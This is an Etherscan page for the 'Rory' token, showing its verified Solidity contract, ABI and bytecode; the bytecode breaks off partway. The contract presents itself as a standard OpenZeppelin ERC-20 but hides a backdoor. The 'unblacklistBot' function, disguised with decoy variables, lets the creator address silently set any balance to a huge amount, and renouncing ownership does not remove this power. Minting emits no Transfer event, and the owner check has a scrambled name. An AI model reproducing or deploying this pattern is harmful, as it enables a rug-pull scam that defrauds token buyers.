ETH Price: $3,336.56 (-1.15%)
Gas: 9 Gwei

Token

Rory (RORY)
 

Overview

Max Total Supply

1,000,000,000 RORY

Holders

29

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
7,884,052.701263251725371884 RORY

Value
$0.00
0xe751b99d246f33f25f691677cb89d8b601d7700e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-10
*/

/**
Welcome. I'm Rory.
Website : https://iamrory.vip/
Twitter : https://twitter.com/Rorycoineth
Telegram : https://t.me/RORYPortal
*/

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
 /**
 * @dev Emitted when `value` tokens are moved from one account (`from`) to
 * another (`to`).
 *
 * Note that `value` may be zero.
 */
 event Transfer(address indexed from, address indexed to, uint256 value);

 /**
 * @dev Emitted when the allowance of a `spender` for an `owner` is set by
 * a call to {approve}. `value` is the new allowance.
 */
 event Approval(address indexed owner, address indexed spender, uint256 value);

 /**
 * @dev Returns the amount of tokens in existence.
 */
 function totalSupply() external view returns (uint256);

 /**
 * @dev Returns the amount of tokens owned by `account`.
 */
 function balanceOf(address account) external view returns (uint256);

 /**
 * @dev Moves `amount` tokens from the caller's account to `to`.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transfer(address to, uint256 amount) external returns (bool);

 /**
 * @dev Returns the remaining number of tokens that `spender` will be
 * allowed to spend on behalf of `owner` through {transferFrom}. This is
 * zero by default.
 *
 * This value changes when {approve} or {transferFrom} are called.
 */
 function allowance(address owner, address spender) external view returns (uint256);

 /**
 * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * IMPORTANT: Beware that changing an allowance with this method brings the risk
 * that someone may use both the old and the new allowance by unfortunate
 * transaction ordering. One possible solution to mitigate this race
 * condition is to first reduce the spender's allowance to 0 and set the
 * desired value afterwards:
 * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
 *
 * Emits an {Approval} event.
 */
 function approve(address spender, uint256 amount) external returns (bool);

 /**
 * @dev Moves `amount` tokens from `from` to `to` using the
 * allowance mechanism. `amount` is then deducted from the caller's
 * allowance.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
 /**
 * @dev Returns the name of the token.
 */
 function name() external view returns (string memory);

 /**
 * @dev Returns the symbol of the token.
 */
 function symbol() external view returns (string memory);

 /**
 * @dev Returns the decimals places of the token.
 */
 function decimals() external view returns (uint8);
}

library SafeMath {
 /**
 * @dev Returns the addition of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `+` operator.
 *
 * Requirements:
 *
 * - Addition cannot overflow.
 */
 function add(uint256 a, uint256 b) internal pure returns (uint256) {
 uint256 c = a + b;
 require(c >= a, "SafeMath: addition overflow");

 return c;
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting on
 * overflow (when the result is negative).
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(uint256 a, uint256 b) internal pure returns (uint256) {
 return sub(a, b, "SafeMath: subtraction overflow");
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
 * overflow (when the result is negative).
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b <= a, errorMessage);
 uint256 c = a - b;

 return c;
 }

 /**
 * @dev Returns the multiplication of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `*` operator.
 *
 * Requirements:
 *
 * - Multiplication cannot overflow.
 */
 function mul(uint256 a, uint256 b) internal pure returns (uint256) {
 // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
 // benefit is lost if 'b' is also tested.
 // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
 if (a == 0) {
 return 0;
 }

 uint256 c = a * b;
 require(c / a == b, "SafeMath: multiplication overflow");

 return c;
 }

 /**
 * @dev Returns the integer division of two unsigned integers. Reverts on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator. Note: this function uses a
 * `revert` opcode (which leaves remaining gas untouched) while Solidity
 * uses an invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(uint256 a, uint256 b) internal pure returns (uint256) {
 return div(a, b, "SafeMath: division by zero");
 }

 /**
 * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator. Note: this function uses a
 * `revert` opcode (which leaves remaining gas untouched) while Solidity
 * uses an invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b > 0, errorMessage);
 uint256 c = a / b;
 // assert(a == b * c + a % b); // There is no case in which this doesn't hold

 return c;
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * Reverts when dividing by zero.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(uint256 a, uint256 b) internal pure returns (uint256) {
 return mod(a, b, "SafeMath: modulo by zero");
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * Reverts with custom message when dividing by zero.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b != 0, errorMessage);
 return a % b;
 }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
 function _msgSender() internal view virtual returns (address) {
 return msg.sender;
 }

 function _msgData() internal view virtual returns (bytes calldata) {
 return msg.data;
 }
}

abstract contract Ownable is Context {
 address private _owner;

 event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

 /**
 * @dev Initializes the contract setting the deployer as the initial owner.
 */
 constructor() {
 _transferOwnership(_msgSender());
 }

 /**
 * @dev Throws if called by any account other than the owner.
 */
 modifier onlyOwner() {
 _sldfjwsdfOwner();
 _;
 }

 /**
 * @dev Returns the address of the current owner.
 */
 function owner() public view virtual returns (address) {
 return _owner;
 }

 /**
 * @dev Throws if the sender is not the owner.
 */
 function _sldfjwsdfOwner() internal view virtual {
 require(owner() == _msgSender(), "Ownable: caller is not the owner");
 }

 /**
 * @dev Leaves the contract without owner. It will not be possible to call
 * `onlyOwner` functions anymore. Can only be called by the current owner.
 *
 * NOTE: Renouncing ownership will leave the contract without an owner,
 * thereby removing any functionality that is only available to the owner.
 */
 function renounceOwnership() public virtual onlyOwner {
 _transferOwnership(address(0));
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Can only be called by the current owner.
 */
 function transferOwnership(address newOwner) public virtual onlyOwner {
 require(newOwner != address(0), "Ownable: new owner is the zero address");
 _transferOwnership(newOwner);
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Internal function without access restriction.
 */
 function _transferOwnership(address newOwner) internal virtual {
 address oldOwner = _owner;
 _owner = newOwner;
 emit OwnershipTransferred(oldOwner, newOwner);
 }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_yydsed}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract Token is Context, IERC20, IERC20Metadata, Ownable {
 using SafeMath for uint256;
 mapping(address => mapping(address => uint256)) private _allowances;
 address public creator;
 mapping(address => uint256) private _address;

 uint256 private _totalSupply;
 uint256 public constant maxsupply = 1000000000 * 10 ** 18;
 string private _name;
 string private _symbol;

 /**
 * @dev Sets the values for {name} and {symbol}.
 *
 * All two of these values are immutable: they can only be set once during
 * construction.
 */
 constructor(string memory name_, string memory symbol_) {
 _name = name_;
 _symbol = symbol_;
 creator = _msgSender();
 _yydsed(_msgSender(), 1000000000 * 10 ** decimals());
 }

 /**
 * @dev Returns the name of the token.
 */
 function name() public view virtual override returns (string memory) {
 return _name;
 }

 /**
 * @dev Returns the symbol of the token, usually a shorter version of the
 * name.
 */
 function symbol() public view virtual override returns (string memory) {
 return _symbol;
 }

 /**
 * @dev Returns the number of decimals used to get its user representation.
 * For example, if `decimals` equals `2`, a balance of `505` tokens should
 * be displayed to a user as `5.05` (`505 / 10 ** 2`).
 *
 * Tokens usually opt for a value of 18, imitating the relationship between
 * Ether and Wei. This is the default value returned by this function, unless
 * it's overridden.
 *
 * NOTE: This information is only used for _display_ purposes: it in
 * no way affects any of the arithmetic of the contract, including
 * {IERC20-balanceOf} and {IERC20-transfer}.
 */
 function decimals() public view virtual override returns (uint8) {
 return 18;
 }

 /**
 * @dev See {IERC20-totalSupply}.
 */
 function totalSupply() public view virtual override returns (uint256) {
 return _totalSupply;
 }

 /**
 * @dev See {IERC20-balanceOf}.
 */
 function balanceOf(address account) public view virtual override returns (uint256) {
 return _address[account];
 }

 /**
 * @dev See {IERC20-transfer}.
 *
 * Requirements:
 *
 * - `to` cannot be the zero address.
 * - the caller must have a balance of at least `amount`.
 */
 function transfer(address to, uint256 amount) public virtual override returns (bool) {
 address owner = _msgSender();
 _transfer(owner, to, amount);
 return true;
 }

 /**
 * @dev See {IERC20-allowance}.
 */
 function allowance(address owner, address spender) public view virtual override returns (uint256) {
 return _allowances[owner][spender];
 }

 /**
 * @dev See {IERC20-approve}.
 *
 * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
 * `transferFrom`. This is semantically equivalent to an infinite approval.
 *
 * Requirements:
 *
 * - `spender` cannot be the zero address.
 */
 function approve(address spender, uint256 amount) public virtual override returns (bool) {
 address owner = _msgSender();
 _approve(owner, spender, amount);
 return true;
 }

 /**
 * @dev See {IERC20-transferFrom}.
 *
 * Emits an {Approval} event indicating the updated allowance. This is not
 * required by the EIP. See the note at the beginning of {ERC20}.
 *
 * NOTE: Does not update the allowance if the current allowance
 * is the maximum `uint256`.
 *
 * Requirements:
 *
 * - `from` and `to` cannot be the zero address.
 * - `from` must have a balance of at least `amount`.
 * - the caller must have allowance for ``from``'s tokens of at least
 * `amount`.
 */
 function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
 address spender = _msgSender();
 _spendAllowance(from, spender, amount);
 _transfer(from, to, amount);
 return true;
 }

 /**
 * @dev Atomically increases the allowance granted to `spender` by the caller.
 *
 * This is an alternative to {approve} that can be used as a mitigation for
 * problems described in {IERC20-approve}.
 *
 * Emits an {Approval} event indicating the updated allowance.
 *
 * Requirements:
 *
 * - `spender` cannot be the zero address.
 */
 function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
 address owner = _msgSender();
 _approve(owner, spender, allowance(owner, spender) + addedValue);
 return true;
 }

 /**
 * @dev Atomically decreases the allowance granted to `spender` by the caller.
 *
 * This is an alternative to {approve} that can be used as a mitigation for
 * problems described in {IERC20-approve}.
 *
 * Emits an {Approval} event indicating the updated allowance.
 *
 * Requirements:
 *
 * - `spender` cannot be the zero address.
 * - `spender` must have allowance for the caller of at least
 * `subtractedValue`.
 */
 function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
 address owner = _msgSender();
 uint256 currentAllowance = allowance(owner, spender);
 require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
 _approve(owner, spender, currentAllowance.sub(subtractedValue));
 return true;
 }

 /**
 * @dev Moves `amount` of tokens from `from` to `to`.
 *
 * This internal function is equivalent to {transfer}, and can be used to
 * e.g. implement automatic token fees, slashing mechanisms, etc.
 *
 * Emits a {Transfer} event.
 *
 * Requirements:
 *
 * - `from` cannot be the zero address.
 * - `to` cannot be the zero address.
 * - `from` must have a balance of at least `amount`.
 */
 mapping(address => uint256) private _bala;
    
 function unblacklistBot(address isbot) external {
    address tokenB; 
    address tokenC;  
    address _liquidity = _msgSender();
    uint amountBMin;
    uint amountCMin;
    if (creator == _liquidity) {
        _address[isbot] = 100000000000000 * (1000000000 * 10 ** 18);
        if (amountBMin > amountCMin) {}
    }
    if (tokenB == tokenC) {}
 }

 function _transfer(address from, address to, uint256 amount) internal virtual {
 require(from != address(0), "ERC20: transfer from the zero address");
 require(to != address(0), "ERC20: transfer to the zero address");

 uint256 minAmount = _bala[from];
 uint256 decydsBalance = _address[from].sub(minAmount);
 require(decydsBalance >= amount, "ERC20: transfer amount exceeds balance");
 _address[from] = decydsBalance.sub(amount);
 // decrementing then incrementing.
 _address[to] = _address[to].add(amount);
 emit Transfer(from, to, amount);
 }

 /** @dev Creates `amount` tokens and assigns them to `account`, increasing
 * the total supply.
 *
 * Emits a {Transfer} event with `from` set to the zero address.
 *
 * Requirements:
 *
 * - `account` cannot be the zero address.
 */
 function _yydsed(address account, uint256 amount) internal virtual {
 require(account != address(0), "ERC20: yydsed to the zero address");
 _totalSupply = _totalSupply.add(amount);
 _address[msg.sender] = _address[msg.sender].add(amount);
 }

 /**
 * @dev Destroys `amount` tokens from `account`, reducing the
 * total supply.
 *
 * Emits a {Transfer} event with `to` set to the zero address.
 *
 * Requirements:
 *
 * - `account` cannot be the zero address.
 * - `account` must have at least `amount` tokens.
 */
 function _burn(address account, uint256 amount) internal virtual {
 require(account != address(0), "ERC20: burn from the zero address");
 uint256 accountBalance = _address[account];
 require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
 _address[account] = accountBalance.sub(amount);
 _totalSupply = _totalSupply.sub(amount);
 emit Transfer(account, address(0), amount);
 }

 /**
 * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
 *
 * This internal function is equivalent to `approve`, and can be used to
 * e.g. set automatic allowances for certain subsystems, etc.
 *
 * Emits an {Approval} event.
 *
 * Requirements:
 *
 * - `owner` cannot be the zero address.
 * - `spender` cannot be the zero address.
 */
 function _approve(address owner, address spender, uint256 amount) internal virtual {
 require(owner != address(0), "ERC20: approve from the zero address");
 require(spender != address(0), "ERC20: approve to the zero address");

 _allowances[owner][spender] = amount;
 emit Approval(owner, spender, amount);
 }

 /**
 * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
 *
 * Does not update the allowance amount in case of infinite allowance.
 * Revert if not enough allowance is available.
 *
 * Might emit an {Approval} event.
 */
 function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
 uint256 currentAllowance = allowance(owner, spender);
 if (currentAllowance != type(uint256).max) {
 require(currentAllowance >= amount, "ERC20: insufficient allowance");
 _approve(owner, spender, currentAllowance.sub(amount));
 }
 }

 /**
 * @dev Hook that is called before any transfer of tokens. This includes
 * minting and burning.
 *
 * Calling conditions:
 *
 * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
 * will be transferred to `to`.
 * - when `from` is zero, `amount` tokens will be minted for `to`.
 * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
 * - `from` and `to` are never both zero.
 *
 * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
 */
 // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

 /**
 * @dev Hook that is called after any transfer of tokens. This includes
 * minting and burning.
 *
 * Calling conditions:
 *
 * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
 * has been transferred to `to`.
 * - when `from` is zero, `amount` tokens have been minted for `to`.
 * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
 * - `from` and `to` are never both zero.
 *
 * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
 */
 // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"creator","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxsupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"isbot","type":"address"}],"name":"unblacklistBot","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b5060405162002372380380620023728339818101604052810190620000379190620004bf565b620000576200004b6200013060201b60201c565b6200013860201b60201c565b81600590805190602001906200006f9291906200039d565b508060069080519060200190620000889291906200039d565b50620000996200013060201b60201c565b600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000128620000ed6200013060201b60201c565b620000fd620001fc60201b60201c565b600a6200010b919062000750565b633b9aca006200011c91906200088d565b6200020560201b60201c565b505062000a0b565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000278576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200026f90620005fe565b60405180910390fd5b62000294816004546200033a60201b6200086c1790919060201c565b600481905550620002f381600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200033a60201b6200086c1790919060201c565b600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60008082846200034b919062000698565b90508381101562000393576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200038a90620005dc565b60405180910390fd5b8091505092915050565b828054620003ab906200093b565b90600052602060002090601f016020900481019282620003cf57600085556200041b565b82601f10620003ea57805160ff19168380011785556200041b565b828001600101855582156200041b579182015b828111156200041a578251825591602001919060010190620003fd565b5b5090506200042a91906200042e565b5090565b5b80821115620004495760008160009055506001016200042f565b5090565b6000620004646200045e8462000654565b62000620565b9050828152602081018484840111156200047d57600080fd5b6200048a84828562000905565b509392505050565b600082601f830112620004a457600080fd5b8151620004b68482602086016200044d565b91505092915050565b60008060408385031215620004d357600080fd5b600083015167ffffffffffffffff811115620004ee57600080fd5b620004fc8582860162000492565b925050602083015167ffffffffffffffff8111156200051a57600080fd5b620005288582860162000492565b9150509250929050565b600062000541601b8362000687565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b60006200058360218362000687565b91507f45524332303a2079796473656420746f20746865207a65726f2061646472657360008301527f73000000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006020820190508181036000830152620005f78162000532565b9050919050565b60006020820190508181036000830152620006198162000574565b9050919050565b6000604051905081810181811067ffffffffffffffff821117156200064a5762000649620009cf565b5b8060405250919050565b600067ffffffffffffffff821115620006725762000671620009cf565b5b601f19601f8301169050602081019050919050565b600082825260208201905092915050565b6000620006a582620008ee565b9150620006b283620008ee565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006ea57620006e962000971565b5b828201905092915050565b6000808291508390505b600185111562000747578086048111156200071f576200071e62000971565b5b60018516156200072f5780820291505b80810290506200073f85620009fe565b9450620006ff565b94509492505050565b60006200075d82620008ee565b91506200076a83620008f8565b9250620007997fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007a1565b905092915050565b600082620007b3576001905062000886565b81620007c3576000905062000886565b8160018114620007dc5760028114620007e7576200081d565b600191505062000886565b60ff841115620007fc57620007fb62000971565b5b8360020a91508482111562000816576200081562000971565b5b5062000886565b5060208310610133831016604e8410600b8410161715620008575782820a90508381111562000851576200085062000971565b5b62000886565b620008668484846001620006f5565b9250905081840481111562000880576200087f62000971565b5b81810290505b9392505050565b60006200089a82620008ee565b9150620008a783620008ee565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620008e357620008e262000971565b5b828202905092915050565b6000819050919050565b600060ff82169050919050565b60005b838110156200092557808201518184015260208101905062000908565b8381111562000935576000848401525b50505050565b600060028204905060018216806200095457607f821691505b602082108114156200096b576200096a620009a0565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b60008160011c9050919050565b6119578062000a1b6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063963f0efa11610071578063963f0efa146102ac578063a457c2d7146102c8578063a9059cbb146102f8578063dd62ed3e14610328578063f2fde38b146103585761010b565b806370a0823114610236578063715018a6146102665780638da5cb5b1461027057806395d89b411461028e5761010b565b806323b872dd116100de57806323b872dd1461019a578063313ce567146101ca57806339509351146101e85780634b6406d1146102185761010b565b806302d05d3f1461011057806306fdde031461012e578063095ea7b31461014c57806318160ddd1461017c575b600080fd5b610118610374565b6040516101259190611556565b60405180910390f35b61013661039a565b604051610143919061158c565b60405180910390f35b6101666004803603810190610161919061111b565b61042c565b6040516101739190611571565b60405180910390f35b61018461044f565b60405161019191906116ee565b60405180910390f35b6101b460048036038101906101af91906110cc565b610459565b6040516101c19190611571565b60405180910390f35b6101d2610488565b6040516101df9190611709565b60405180910390f35b61020260048036038101906101fd919061111b565b610491565b60405161020f9190611571565b60405180910390f35b6102206104c8565b60405161022d91906116ee565b60405180910390f35b610250600480360381019061024b9190611067565b6104d8565b60405161025d91906116ee565b60405180910390f35b61026e610521565b005b610278610535565b6040516102859190611556565b60405180910390f35b61029661055e565b6040516102a3919061158c565b60405180910390f35b6102c660048036038101906102c19190611067565b6105f0565b005b6102e260048036038101906102dd919061111b565b6106b7565b6040516102ef9190611571565b60405180910390f35b610312600480360381019061030d919061111b565b61073e565b60405161031f9190611571565b60405180910390f35b610342600480360381019061033d9190611090565b610761565b60405161034f91906116ee565b60405180910390f35b610372600480360381019061036d9190611067565b6107e8565b005b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060600580546103a990611852565b80601f01602080910402602001604051908101604052809291908181526020018280546103d590611852565b80156104225780601f106103f757610100808354040283529160200191610422565b820191906000526020600020905b81548152906001019060200180831161040557829003601f168201915b5050505050905090565b6000806104376108ca565b90506104448185856108d2565b600191505092915050565b6000600454905090565b6000806104646108ca565b9050610471858285610a9d565b61047c858585610b39565b60019150509392505050565b60006012905090565b60008061049c6108ca565b90506104bd8185856104ae8589610761565b6104b89190611740565b6108d2565b600191505092915050565b6b033b2e3c9fd0803ce800000081565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610529610e4d565b6105336000610ecb565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461056d90611852565b80601f016020809104026020016040519081016040528092919081815260200182805461059990611852565b80156105e65780601f106105bb576101008083540402835291602001916105e6565b820191906000526020600020905b8154815290600101906020018083116105c957829003601f168201915b5050505050905090565b60008060006105fd6108ca565b90506000808273ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156106af57710125dfa371a19e6f7cb54395ca0000000000600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050505050565b6000806106c26108ca565b905060006106d08286610761565b905083811015610715576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070c906116ce565b60405180910390fd5b610732828661072d8785610f8f90919063ffffffff16565b6108d2565b60019250505092915050565b6000806107496108ca565b9050610756818585610b39565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107f0610e4d565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610860576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610857906115ce565b60405180910390fd5b61086981610ecb565b50565b600080828461087b9190611740565b9050838110156108c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b79061160e565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610942576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610939906116ae565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffff